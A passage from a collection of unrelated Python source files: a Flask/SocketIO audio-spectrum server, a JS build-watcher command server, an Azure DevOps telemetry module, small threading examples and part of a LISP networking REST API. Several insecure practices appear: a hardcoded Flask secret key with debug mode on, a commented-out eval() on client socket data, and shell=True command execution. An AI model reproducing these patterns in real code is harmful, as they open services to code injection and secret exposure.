# print ("We're done, we're through, we're over.")
# @socketio.on('change')
# def action(data):
# global system_parameters
# data = eval(str(data))
# system_parameters[data['id']][0]=float(data['val'])
# writeUpdates(system_parameters[data['id']][1],system_parameters[data['id']][0])
# @socketio.on('all set from gui')
# def action():
# global allGoodFromGUI
# allGoodFromGUI = True
# print("we are done from GUI Side")
# inform_dev()
# def inform_dev():
# global serialPort
# global serialLock
# string_to_write = "SET\n"
# if serialConnected:
# serialLock.acquire() #claim serial resource
# if version3:
# serialPort.write(bytes(string_to_write,'UTF-8'))
# else:
# print(string_to_write)
# serialPort.write(string_to_write)
# serialPort.flushInput()
# serialLock.release() #release serial resource back out into big scary world
# else:
# print ("can't inform device since it isn't connected...what does this even mean") # same joe...
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
########################
## ##
## SERVER STUFF ##
## ##
########################
#Start up Flask server:
app = Flask(__name__, template_folder = './',static_url_path='/static')
app.config['SECRET_KEY'] = 'secret!' #shhh don't tell anyone. Is a secret
socketio = SocketIO(app, async_mode = async_mode)
thread = None
global identifiers
def dataThread():
print("yes)")
# Startup has occured
@app.route('/')
def index():
global thread
global fft
global data
print ("A user connected")
if thread is None:
thread = Thread(target=dataThread)
thread.daemon = True
thread.start()
# NOTE: Leaving this oen
# fft = Thread(target=micThread)
# fft.daemon = True
# fft.start()
return render_template('pages/main.html')
# Return the configuration
@app.route('/config', methods=['GET', 'POST'])
def config():
if request.method == 'GET':
SITE_ROOT = os.path.realpath(os.path.dirname(__file__))
json_url = os.path.join(SITE_ROOT, "static/json/", "config.json")
checkJson(json_url)
config = json.load(open(json_url))
return jsonify(config)
elif request.method == 'POST':
print("can't really post anything yet, sorry...")
else:
print("Check your request method.")
# print(identifiers['ToneGenerator'])
# Check and update identifiers in the json. plus other things
def checkJson(json_url):
# Make global dictionary of ID's
global identifiers
identifiers = {}
# Open Json
with open(json_url, "r") as jsonFile:
config = json.load(jsonFile)
# Function to generate new unique identifier
def newUnique(n):
range_start = 10**(n-1)
range_end = (10**n)-1
return randint(range_start, range_end)
# List to store existing unique values
uniques = []
# Open up modules portion of config.json
modules = config[1]['modules']
for module in modules:
for instance in module:
for item in module[instance]:
# Check if module already has unique identifer
if 'unique' in item:
# Appends existing identifier to uniques
uniques.append(item['unique'])
else:
# Generates new unique identifier
unique = newUnique(3)
# Checks if identifier hasn't already been used
if unique not in uniques:
# Assings identifier for that module
item['unique'] = unique
identifiers[item['name']] = item['unique']
# Write modified json file
with open(json_url, "w") as jsonFile:
# Complicated dump so that everytime we modify the json it isn't minified
json.dump(config, jsonFile, sort_keys=True,indent=2,separators=(',',': '))
# Arbitrary for the time being, but this will lead to the generation page
@app.route('/generate')
def configGenerate():
global identifiers
return render_template('pages/index.html')
# Universal announcer
@socketio.on('reporting')
def announce(content):
# Capture variables
unique = content['unique']
div = content['div']
data = content['data']
# Send variables
socketio.emit("announce_{}".format(unique),data=(unique,div,data))
@app.route("/simple.png")
def simple():
import datetime
import io
import random
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
from matplotlib.dates import DateFormatter
try:
while True:
fig=Figure()
ax=fig.add_subplot(111)
x=[]
y=[]
now=datetime.datetime.now()
delta=datetime.timedelta(days=1)
for i in range(10):
x.append(now)
now+=delta
y.append(random.randint(0, 1000))
ax.plot_date(x, y, '-')
ax.xaxis.set_major_formatter(DateFormatter('%Y-%m-%d'))
fig.autofmt_xdate()
canvas=FigureCanvas(fig)
png_output = io.BytesIO()
canvas.print_png(png_output)
response=make_response(png_output.getvalue())
response.headers['Content-Type'] = 'image/png'
return response
time.sleep(.001)
fig.cla()
except:
print('welp')
def micThread():
# First time setup
first_time = True
if ( first_time ):
wow = SpectrumAnalyzer()
first_time = False
# Etc
unique = 450
burst_duration = 1
counter = 0
toggle_count = 500
on_state = True
name = 'joe'
while True:
counter +=1
if counter%burst_duration == 0:
socketio.emit('update_{}'.format(unique),wow.fft())
if counter%toggle_count == 0:
counter = 0
if on_state:
print("OFF")
else:
print("ON")
on_state = not on_state
time.sleep(0.001)
class SpectrumAnalyzer:
# Start Pyaudio
p = pyaudio.PyAudio()
# Select Device
device = p.get_device_info_by_host_api_device_index(0, 0)
# Device Specs
CHUNK = 1024
CHANNELS = int(device['maxInputChannels'])
FORMAT = pyaudio.paFloat32
RATE = int(device['defaultSampleRate'])
START = 0
N = CHUNK
wave_x = 0
wave_y = 0
spec_x = 0
spec_y = 0
data = []
def __init__(self):
self.pa = pyaudio.PyAudio()
self.stream = self.pa.open(
format = self.FORMAT,
channels = self.CHANNELS,
rate = self.RATE,
input = True,
output = False,
input_device_index = 0,
frames_per_buffer = self.CHUNK)
def audioinput(self):
data = np.fromstring(self.stream.read(self.CHUNK),dtype=np.float32)
# ret = self.stream.read(self.CHUNK)
# ret = np.fromstring(ret, dtype=np.float32)
return data
def fft(self):
self.data = self.audioinput()
self.wave_x = range(self.START, self.START + self.N)
self.wave_y = self.data[self.START:self.START + self.N]
self.spec_x = np.fft.fftfreq(self.N, d = 1.0 / self.RATE)
y = np.fft.fft(self.data[self.START:self.START + self.N])
self.spec_y = [np.sqrt(c.real ** 2 + c.imag ** 2) for c in y]
return self.spec_y
if __name__ == '__main__' or __name__ == 'server':
socketio.run(app, port=3000, debug=True) |
js_env.py | import re
import os
import shlex
import subprocess
import datetime
import configparser
import argparse
from glob import glob
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from flask import Flask
from threading import Thread
def which(program):
"""
This function is taken from
http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python
"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
class Singleton:
"""
A non-thread-safe helper class to ease implementing singletons.
This should be used as a decorator -- not a metaclass -- to the
class that should be a singleton.
The decorated class can define one `__init__` function that
takes only the `self` argument. Other than that, there are
no restrictions that apply to the decorated class.
To get the singleton instance, use the `Instance` method. Trying
to use `__call__` will result in a `TypeError` being raised.
Limitations: The decorated class cannot be inherited from.
This singleton class is taken from
http://stackoverflow.com/questions/42558/python-and-the-singleton-pattern
"""
def __init__(self, decorated):
self._decorated = decorated
def Instance(self):
"""
Returns the singleton instance. Upon its first call, it creates a
new instance of the decorated class and calls its `__init__` method.
On all subsequent calls, the already created instance is returned.
"""
try:
return self._instance
except AttributeError:
self._instance = self._decorated()
return self._instance
def __call__(self):
raise TypeError('Singletons must be accessed through `Instance()`.')
def __instancecheck__(self, inst):
return isinstance(inst, self._decorated)
class Configuration:
def __init__(self):
self._conf = configparser.ConfigParser()
self._conf.optionxform = str
self._conf.read('.js_env_config')
self._excluded_regex = []
self._excluded_extensions = []
self._included_extensions = []
self._excluded_files = []
self._excluded_folders = ["node_modules"]
self._commands = ["build", "serve", "start", "test"]
assert "commands" in self._conf
assert "server" in self._conf
assert all([c in self._conf["commands"] for c in self._commands])
@property
def server_port(self):
return self._conf["server"]["port"]
@property
def build_command(self):
return self._conf["commands"]["build"]
@property
def test_command(self):
return self._conf["commands"]["test"]
@property
def run_command(self):
return self._conf["commands"]["run"]
@property
def start_command(self):
return self._conf["commands"]["start"]
@property
def serve_command(self):
return self._conf["commands"]["serve"]
def set_included_extensions(self, included_file_extensions):
self._included_extensions = included_file_extensions
def set_excluded_extensions(self, excluded_file_extensions):
self._excluded_extensions = excluded_file_extensions
def set_excluded_regex(self, excluded_filters):
self._excluded_regex = excluded_filters
def set_excluded_files(self, excluded_files):
self._excluded_files = excluded_files
def set_excluded_folders(self, excluded_folders):
self._excluded_folders = excluded_folders
# is_watched requires full relative filepath
def is_watched(self, filepath):
watched = False
for ext in self._included_extensions:
if filepath.endswith(ext):
watched = True
for ext in self._excluded_extensions:
if filepath.endswith(ext):
watched = False
for folder in self._excluded_folders:
if folder in filepath:
watched = False
for fn in self._excluded_files:
if fn in filepath:
watched = False
for regex in self._excluded_regex:
if re.findall(regex, filepath):
watched = False
return watched
# TODO: This should be cached maybe
def get_watched(self):
"""Get all the watched files, except for the first level folders
in self._excluded_folders
:returns: Watched Files
:rtype: list
"""
all_files = [x for x in os.listdir(".") if os.path.isfile(x)]
all_folders = [x for x in os.listdir(".") if os.path.isdir(x)]
for x in all_folders:
if x not in self._excluded_folders:
all_files.extend(glob(x + '/**', recursive=True))
elements = [f for f in all_files if self.is_watched(f)]
return elements
def getext(filename):
"Get the file extension."
return os.path.splitext(filename)[-1].lower()
def get_now():
return datetime.datetime.now().strftime("%Y/%m/%d %H:%M:%S")
def build():
print("Running build", config.build_command)
if config.build_command:
subprocess.run(config.build_command, shell=True)
return "Building"
def test():
print("Running \"test\"")
if config.test_command:
subprocess.run(shlex.split(config.test_command), shell=True)
return "Testing"
def start():
print("Running \"start\"")
if config.start_command:
subprocess.run(shlex.split(config.start_command), shell=True)
return "Starting"
def run():
print("Running \"run\"")
if config.run_command:
subprocess.run(shlex.split(config.run_command), shell=True)
return "Running"
# TODO: serve is a persistent command, should't be issued like that.
# Or perhaps if serve is called again, then simply stop the
# process and run again
def serve():
print("Running \"serve\"")
if config.run_command:
subprocess.run(config.serve_command, shell=True)
return "Serving"
class ChangeHandler(FileSystemEventHandler):
def __init__(self, root='.'):
self.root = root
self.config = config
def _build_if_watched(self, filepath):
if os.path.isfile(filepath):
pwd = os.path.abspath(self.root) + '/'
# print("filepath", filepath, pwd, pwd in filepath)
filepath = str(filepath)
assert pwd in filepath
filepath = filepath.replace(pwd, '')
watched = self.config.is_watched(filepath)
if watched:
print("file " + filepath + " is watched")
build()
else:
# print("file " + filepath + " is not watched")
pass
else:
# print(filepath + " is not a file")
pass
def on_created(self, event):
print("file " + event.src_path + " created")
self._build_if_watched(event.src_path)
def on_modified(self, event):
print("file " + event.src_path + " modified")
self._build_if_watched(event.src_path)
def on_deleted(self, event):
print("file " + event.src_path + " deleted")
self._build_if_watched(event.src_path)
# TODO: Display config.
# TODO: config should be reparseable, i.e., from an http wrapper if
# parse is called, config should be generated again.
config = Configuration()
def parse_options():
parser = argparse.ArgumentParser(description="Watcher for JS node env")
parser.add_argument("-w", "--watchdog", type=str, default="True",
help="Start watchdog?")
parser.add_argument("-e", "--exclude", dest="exclusions",
default=".pdf,.tex,doc,bin,common,node_modules,build", required=False,
help="The extensions (.pdf for pdf files) or the folders to\
exclude from watch operations separated with commas")
parser.add_argument("--exclude-filters", dest="exclude_filters",
default="#,~,.git", required=False,
help="Files with specific regex to exclude. Should not contain ',' ")
parser.add_argument("--exclude-files", dest="excluded_files",
default="", required=False,
help="Specific files to exclude from watching")
parser.add_argument("-i", "--include", dest="inclusions",
default=".css,.html,.js,.jsx", required=False,
help="The extensions (.pdf for pdf files) or the folders to\
exclude from watch operations separated with commas")
parser.add_argument("--live-server", dest="live_server",
action='store_true',
help="Start a live server? Requires live-server to be installed\
in the nodejs global namespace")
args = parser.parse_args()
if args.watchdog.lower() == "true":
config.watchdog = True
else:
config.watchdog = False
if args.live_server:
config.live_server = True
else:
config.live_server = False
# since it assumes that extensions startwith '.', I'll remove
# the check from the globber later
if args.exclude_filters:
print("Excluding files for given filters",
str(args.exclude_filters.split(',')))
config.set_excluded_regex(args.exclude_filters.split(','))
if args.inclusions:
inclusions = args.inclusions
inclusions = inclusions.split(",")
config.set_included_extensions(
[value for value in inclusions if value.startswith(".")])
if args.excluded_files:
for ef in args.excluded_files.split(','):
assert type(ef) == str
config.set_excluded_files(args.excluded_files.split(','))
if args.exclusions:
exclusions = args.exclusions
exclusions = exclusions.split(",")
excluded_extensions = [value for value in exclusions if value.startswith(".")]
excluded_folders = list(set(exclusions) - set(excluded_extensions))
config.set_excluded_extensions(excluded_extensions)
config.set_excluded_folders(excluded_folders)
def main():
npm_path = which("npm")
if not npm_path:
print("npm executable must be in the path!")
exit()
parse_options()
if config.live_server:
print("Starting live server ...")
p = subprocess.Popen(['live-server', '--open=build'])
t = Thread(target=p.communicate)
t.start()
else:
print("Not starting live server ...")
if config.watchdog:
watched_elements = config.get_watched()
print("Starting watchdog and watching ", watched_elements)
event_handler = ChangeHandler()
observer = Observer()
observer.schedule(event_handler, os.getcwd(), recursive=True)
observer.start()
else:
print("Not starting watchdog ...")
port = config.server_port
app = Flask("npm command server")
@app.route("/build", methods=["GET", "POST"])
def __build():
return build()
@app.route("/test", methods=["GET", "POST"])
def __test():
return test()
@app.route("/run", methods=["GET", "POST"])
def __run():
return run()
@app.route("/start", methods=["GET", "POST"])
def __start():
return start()
@app.route("/serve", methods=["GET", "POST"])
def __serve():
return serve()
print("Starting server on port %s" % str(port))
app.run(host="127.0.0.1", port=port)
if __name__ == '__main__':
main()
|
telemetry.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import threading
from knack.log import get_logger
from azext_devops.devops_sdk.v5_0.customer_intelligence.models import CustomerIntelligenceEvent
logger = get_logger(__name__)
def try_send_telemetry_data(organization):
try:
if _is_telemetry_enabled():
logger.debug('Azure devops telemetry enabled.')
_try_send_tracking_ci_event_async(organization)
else:
logger.debug('Azure devops telemetry disabled.')
except BaseException as ex: # pylint: disable=broad-except
logger.debug(ex, exc_info=True)
logger.debug('Azure devops telemetry sending failed.')
def set_tracking_data(**kwargs):
try:
vsts_tracking_data.area = 'AzureDevopsCli'
vsts_tracking_data.properties = {}
command_line_args = vars(kwargs.get('args', None))
command_line_split = command_line_args['command'].split()
vsts_tracking_data.feature = command_line_split[0]
if len(command_line_split) > 1:
vsts_tracking_data.properties['Command'] = ' '.join(command_line_split[1:])
args = []
for key, value in command_line_args.items():
if value and isinstance(value, str) and not key.startswith('_') and key != 'command':
args.append(key)
vsts_tracking_data.properties['Args'] = ' '.join(args)
vsts_tracking_data.properties['ShellType'] = _get_shell_type()
import sys
vsts_tracking_data.properties['IsInteractive'] = str(sys.stdin.isatty())
vsts_tracking_data.properties['OutputType'] = command_line_args['_output_format']
except BaseException as ex: # pylint: disable=broad-except
logger.debug(ex, exc_info=True)
def _is_telemetry_enabled():
from azure.cli.core import get_default_cli
collect_telemetry = None
# Read the telemetry flag from az cli config file not the az devops extension config file
az_cli_ctx = get_default_cli()
az_config = az_cli_ctx.config
if az_config.has_option('core', 'collect_telemetry'):
collect_telemetry = az_config.get('core', 'collect_telemetry')
return bool(collect_telemetry is None or collect_telemetry != 'no')
def _try_send_tracking_ci_event_async(organization=None):
if (vsts_tracking_data is not None and vsts_tracking_data.area is not None and
vsts_tracking_data.feature is not None):
logger.debug("Logging telemetry to azure devops server.")
try:
thread = threading.Thread(target=_send_tracking_ci_event, args=[organization])
thread.start()
except BaseException as ex: # pylint: disable=broad-except
# we should always continue if we fail to set tracking data
logger.debug(ex, exc_info=True)
else:
logger.debug("Skipping telemetry to azure devops server.")
def _send_tracking_ci_event(organization=None, ci_client=None):
from .services import get_ci_client
if ci_client is None:
ci_client = get_ci_client(organization=organization)
try:
ci_client.publish_events([vsts_tracking_data])
return True
except BaseException as ex: # pylint: disable=broad-except
logger.debug(ex, exc_info=True)
return False
# azure cli uses this to get shell type from os environment
def _get_shell_type():
import os
if 'ZSH_VERSION' in os.environ:
return 'zsh'
if 'BASH_VERSION' in os.environ:
return 'bash'
if 'KSH_VERSION' in os.environ or 'FCEDIT' in os.environ:
return 'ksh'
if 'WINDIR' in os.environ:
return 'cmd'
return _remove_cmd_chars(_remove_symbols(os.environ.get('SHELL')))
def _remove_cmd_chars(s):
if isinstance(s, str):
return s.replace("'", '_').replace('"', '_').replace('\r\n', ' ').replace('\n', ' ')
return s
def _remove_symbols(s):
if isinstance(s, str):
for c in '$%^&|':
s = s.replace(c, '_')
return s
vsts_tracking_data = CustomerIntelligenceEvent()
|
core.py | from messagebus import Bus
from configbus import Config
from threading import Thread
import subprocess
import time
# start jobs
class JobHandler(object):
def __init__(self, job):
self.job_name = job[:-3]
self.command = ['python', '{}'.format(job)]
self.job = object
self.status = False
def start(self):
self.job = subprocess.Popen(self.command)
self.status = True
time.sleep(1)
Bus.logger.send(source='core', msg='{}-job startup'.format(self.job_name))
def term(self):
if self.status is True:
Bus.logger.send(source='core', msg='{}-job shutdown'.format(self.job_name))
if self.job_name == 'logger':
time.sleep(3)
self.job.terminate()
self.job.wait()
self.status = False
def poll(self):
if self.status is True:
return self.job.poll()
def job_control(job):
while True:
# message structure
# message = {'action': 'start/stop'}
message = Bus.display.receive()
if message['action'] == 'stop':
job.term()
# setting monitoring flag false
if job.job_name == 'monitoring':
Config.monitoring.write(False)
elif message['action'] == 'start':
job.start()
# setting monitoring flag true
if job.job_name == 'monitoring':
Config.monitoring.write(True)
def main():
logger = JobHandler('logger.py')
monitor = JobHandler('monitoring.py')
try:
Bus.logger.send(source='core', msg='core-job startup')
logger.start()
t = Thread(target=job_control, args=(monitor,))
t.setDaemon(True)
t.start()
while True:
time.sleep(10)
except KeyboardInterrupt:
print 'KeyboardInterrupt'
monitor.term()
logger.term()
time.sleep(2)
Bus.display.disconnect()
Bus.logger.disconnect()
if __name__ == '__main__':
main()
|
mini_event.py | import threading
class mini_event:
BUTTON_DOWN = 1
BUTTON_UP = 2
BUTTON_HOLD = 3
subscribers = { BUTTON_DOWN: [], BUTTON_UP : [], BUTTON_HOLD: [] }
trigger_hold_stop = False # This value should be turned to True if the hold event callback needs to be stopped.
def add_subscriber( self, callback, event ):
self.subscribers[event].append( callback )
def fire_event( self, event ):
if( event == self.BUTTON_UP ):
self.trigger_hold_stop = True
if( event == self.BUTTON_DOWN ):
self.trigger_hold_stop = False
for callback in self.subscribers[event]:
if( event == self.BUTTON_HOLD ):
thread = threading.Thread(target=callback, args=[self.BUTTON_HOLD, self])
thread.start()
else:
callback(event)
|
4.thread_lock.py | import threading
def job1():
global A, lock
lock.acquire()
for i in range(10):
A += 1
print('job1', A)
lock.release()
def job2():
global A, lock
lock.acquire()
for i in range(10):
A += 10
print('job2', A)
lock.release()
if __name__ == '__main__':
lock = threading.Lock()
A = 0
t1 = threading.Thread(target = job1)
t2 = threading.Thread(target = job2)
t1.start()
t2.start()
|
lisp-core.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-core.py
#
# This is the core process that is used to demux to the specific LISP
# functional components. The 4342 listen socket is centralized here.
#
#
# +------------- data encapsulation via network --------------+
# | |
# | IPC when mr & ms colocated |
# | +--------------------------------+ |
# | | | |
# | | IPC when mr & ddt colo | |
# | | +------------+ | |
# | | | | | |
# | | | v v v 4341
# +-------------+ +----------+ +----------+ +----------+ +----------+
# | lisp-[ir]tr | | lisp-mr | | lisp-ddt | | lisp-ms | | lisp-etr |
# +-------------+ +----------+ +----------+ +----------+ +----------+
# ^ IPC ^ IPC ^ IPC ^ IPC ^ IPC
# | | | | |
# | | | | |
# | | | | |
# +--------------+--------------+--------------+--------------+
# |
# | for dispatching control messages
# +-----------+
# | lisp-core |
# +-----------+
# | 4342
# |
# via network
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import multiprocessing
import threading
import commands
import time
import os
import bottle
from cherrypy import wsgiserver
from cherrypy.wsgiserver.ssl_pyopenssl import pyOpenSSLAdapter
#from OpenSSL import SSL
import json
import sys
import socket
import thread
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_build_date = ""
lisp_control_listen_socket = None
lisp_ipc_socket = None
lisp_ipc_control_socket = None
lisp_sockets = [None, None, None]
lisp_encap_socket = None
#------------------------------------------------------------------------------
#
# lisp_api_get
#
# Ask the LISP subsystem for configuration information.
#
@bottle.route('/lisp/api', method="get")
@bottle.route('/lisp/api/<command>', method="get")
@bottle.route('/lisp/api/<command>/<data_structure>', method="get")
def lisp_api_get(command = "", data_structure=""):
data = [{ "?" : [{"?" : "not-auth"}] }]
#
# Authenticate.
#
if (bottle.request.auth != None):
username, pw = bottle.request.auth
if (lispconfig.lisp_find_user_account(username, pw) == False):
return(json.dumps(data))
#endif
else:
if (bottle.request.headers["User-Agent"].find("python") != -1):
return(json.dumps(data))
#endif
if (lispconfig.lisp_validate_user() == False):
return(json.dumps(data))
#endif
#endif
#
# First check for dynamic data. That is go get data from appropriate
# process. Return from process in JSON format.
#
if (command == "data" and data_structure != ""):
jdata = bottle.request.body.readline()
data = json.loads(jdata) if jdata != "" else ""
if (data != ""): data = data.values()[0]
if (data == []): data = ""
if (type(data) == dict and type(data.values()[0]) == dict):
data = data.values()[0]
#endif
data = lisp_get_api_data(data_structure, data)
return(data)
#endif
#
# A valid user can access data now.
#
if (command != ""):
command = "lisp " + command
else:
jdata = bottle.request.body.readline()
if (jdata == ""):
data = [{ "?" : [{"?" : "no-body"}] }]
return(json.dumps(data))
#endif
data = json.loads(jdata)
command = data.keys()[0]
#endif
data = lispconfig.lisp_get_clause_for_api(command)
return(json.dumps(data))
#enddef
#
# lisp_get_api_system
#
# Return system information in dictionary array (JSON format).
#
def lisp_get_api_system():
data = {}
data["hostname"] = socket.gethostname()
data["system-uptime"] = commands.getoutput("uptime")
data["lisp-uptime"] = lisp.lisp_print_elapsed(lisp.lisp_uptime)
data["lisp-version"] = lisp.lisp_version
yesno = "yes" if os.path.exists("./logs/lisp-traceback.log") else "no"
data["traceback-log"] = yesno
v4 = lisp.lisp_myrlocs[0]
v6 = lisp.lisp_myrlocs[1]
v4 = "none" if (v4 == None) else v4.print_address_no_iid()
v6 = "none" if (v6 == None) else v6.print_address_no_iid()
data["lisp-rlocs"] = [v4, v6]
return(json.dumps(data))
#enddef
#
# lisp_get_api_data
#
# Send IPC message to process that owns the dynamic data strucutre we
# are retrieving via the API. Variable data for the 'map-cache' and
# 'site-cache' API contains:
#
# { "eid-prefix" : <eid>, "group-prefix" : <group>, "instance-id" : <iid> }
#
# For 'map-resolver' and 'map-server" API contains:
#
# { "address" : <address>" } or { "dns-name" : <dns-name> }
#
def lisp_get_api_data(data_structure, data):
valid_apis = ["site-cache", "map-cache", "system", "map-resolver",
"map-server"]
if (data_structure not in valid_apis): return(json.dumps([]))
#
# lisp-core process handles the system lispapi.get_system() API.
#
if (data_structure == "system"): return(lisp_get_api_system())
#
# Build IPC, acquire lock, and send IPC message. Then wait.
#
if (data != ""): data = json.dumps(data)
ipc = lisp.lisp_api_ipc("lisp-core", data_structure + "%" + data)
if (data_structure in ["map-cache", "map-resolver"]):
if (lisp.lisp_is_running("lisp-rtr")):
lisp.lisp_ipc_lock.acquire()
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-rtr")
elif (lisp.lisp_is_running("lisp-itr")):
lisp.lisp_ipc_lock.acquire()
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-itr")
else:
return(json.dumps([]))
#endif
#endif
if (data_structure == "map-server"):
if (lisp.lisp_is_running("lisp-etr")):
lisp.lisp_ipc_lock.acquire()
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
else:
return(json.dumps([]))
#endif
#endif
if (data_structure == "site-cache"):
if (lisp.lisp_is_running("lisp-ms")):
lisp.lisp_ipc_lock.acquire()
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-ms")
else:
return(json.dumps([]))
#endif
#endif
lisp.lprint("Waiting for api get-data '{}', parmameters: '{}'".format( \
data_structure, data))
opcode, source, port, output = lisp.lisp_receive(lisp_ipc_socket, True)
lisp.lisp_ipc_lock.release()
return(output)
#enddef
#
# lisp_api_put_delete
#
# Tell the LISP subsystem to add/replace or remove a command clause.
#
@bottle.route('/lisp/api', method="put")
@bottle.route('/lisp/api/<command>', method="put")
@bottle.route('/lisp/api/<command>', method="delete")
def lisp_api_put_delete(command = ""):
data = [{ "?" : [{"?" : "not-auth"}] }]
if (bottle.request.auth == None): return(data)
#
# Authenticate.
#
if (bottle.request.auth != None):
username, pw = bottle.request.auth
if (lispconfig.lisp_find_user_account(username, pw) == False):
return(json.dumps(data))
#endif
else:
if (bottle.request.headers["User-Agent"].find("python") != -1):
return(json.dumps(data))
#endif
if (lispconfig.lisp_validate_user() == False):
return(json.dumps(data))
#endif
#endif
#
# If the request is to add, change, or remove a "user-account" command,
# the validated user must be configured as a superuser.
#
if (command == "user-account"):
if (lispconfig.lisp_is_user_superuser(username) == False):
data = [{ "user-account" : [{"?" : "not-auth"}] }]
return(json.dumps(data))
#endif
#endif
#
# A valid user can access data now.
#
jdata = bottle.request.body.readline()
if (jdata == ""):
data = [{ "?" : [{"?" : "no-body"}] }]
return(json.dumps(data))
#endif
data = json.loads(jdata)
if (command != ""):
command = "lisp " + command
else:
command = data[0].keys()[0]
#endif
#
# Add, replace, or remove lines from configuration file. Grab config
# file lock.
#
lisp.lisp_ipc_lock.acquire()
if (bottle.request.method == "DELETE"):
data = lispconfig.lisp_remove_clause_for_api(data)
else:
data = lispconfig.lisp_put_clause_for_api(data)
#endif
lisp.lisp_ipc_lock.release()
return(json.dumps(data))
#enddef
#
# lisp_show_api_doc
#
@bottle.route('/lisp/show/api-doc', method="get")
def lisp_show_api_doc():
if (os.path.exists("lispapi.py")): os.system("pydoc lispapi > lispapi.txt")
if (os.path.exists("lispapi.txt") == False):
return("lispapi.txt file not found")
#endif
return(bottle.static_file("lispapi.txt", root="./"))
#enddef
#
# lisp_show_command_doc
#
@bottle.route('/lisp/show/command-doc', method="get")
def lisp_show_comamnd_doc():
return(bottle.static_file("lisp.config.example", root="./",
mimetype="text/plain"))
#enddef
#
# lisp_show_lisp_xtr
#
# Display the show-xtr file that the go data-plane lisp-xtr writes to.
#
@bottle.route('/lisp/show/lisp-xtr', method="get")
def lisp_show_lisp_xtr():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Special case to look for a other data-planes. If it does not exist, check
# the lispers.net go data-plane.
#
if (os.path.exists("./show-ztr")):
f = open("./show-ztr", "r"); lines = f.read(); f.close()
else:
f = open("./show-xtr", "r"); lines = f.read(); f.close()
#endif
new = ""
lines = lines.split("\n")
for line in lines:
if (line[0:4] == " "): new += lisp.lisp_space(4)
if (line[0:2] == " "): new += lisp.lisp_space(2)
new += line + "<br>"
#endfor
new = lisp.convert_font(new)
return(lisp.lisp_print_sans(new))
#enddef
#
# lisp_show_keys
#
# Display LISP crypto-key-list to ITR, ETR, RTR.
#
@bottle.route('/lisp/show/<xtr>/keys', method="get")
def lisp_show_keys(xtr):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
superuser = lispconfig.lisp_is_user_superuser(None)
if (superuser == False):
output = "Permission denied"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
if (xtr not in ["itr", "etr", "rtr"]):
output = "Invalid URL"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
command = "show {}-keys".format(xtr)
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_geo_map
#
# Use Google Maps API to draw a circle on a geographical map. The html file
# ./lispers.net-geo.html is javascript to call the Google API.
#
@bottle.route('/lisp/geo-map/<geo_prefix>')
def lisp_show_geo_map(geo_prefix):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
geo_prefix = geo_prefix.split("-")
geo_prefix = "-".join(geo_prefix[0:-1]) + "/" + geo_prefix[-1]
geo = lisp.lisp_geo("")
geo.parse_geo_string(geo_prefix)
lat, lon = geo.dms_to_decimal()
radius = geo.radius * 1000
r = open("./lispers.net-geo.html", "r"); html = r.read(); r.close()
html = html.replace("$LAT", str(lat))
html = html.replace("$LON", str(lon))
html = html.replace("$RADIUS", str(radius))
return(html)
#enddef
#
# lisp_core_login_page
#
# Print to browser landing page.
#
@bottle.route('/lisp/login', method="get")
def lisp_core_login_page():
return(lispconfig.lisp_login_page())
#enddef
#
# lisp_core_do_login
#
# Get login info entered in forms data. Validate and add to cookie database.
# If valid, take user to landing page. Othereise, go back to login page.
#
@bottle.route('/lisp/login', method="post")
def lisp_core_do_login():
if (lispconfig.lisp_validate_user()):
return(lispconfig.lisp_landing_page())
#endif
return(lisp_core_login_page())
#enddef
#
# lisp_core_landing_page
#
# Print to browser landing page.
#
@bottle.route('/lisp')
def lisp_core_landing_page():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_landing_page())
#enddef
#
# lisp_core_traceback_page
#
# Look in log files for Traceback messages.
#
@bottle.route('/lisp/traceback')
def lisp_core_traceback_page():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
clean = True
#
# Check explicit lisp-traceback.log.
#
if (os.path.exists("./logs/lisp-traceback.log")):
output = commands.getoutput("cat ./logs/lisp-traceback.log")
if (output):
output = output.replace("----------", "<b>----------</b>")
output = output.replace("\n", "<br>")
clean = False
#endif
#endif
#
# Look for Traceback messages in log files.
#
if (clean):
output = ""
cmd = "egrep --with-filename Traceback ./logs/*.log"
log_files = commands.getoutput(cmd)
for lf in log_files:
if (lf.find(":") == -1): continue
line = lf.split(":")
if (line[1] == "0"): continue
output += "Found Tracebacks in log file {}<br>".format(line[0])
clean = False
#endfor
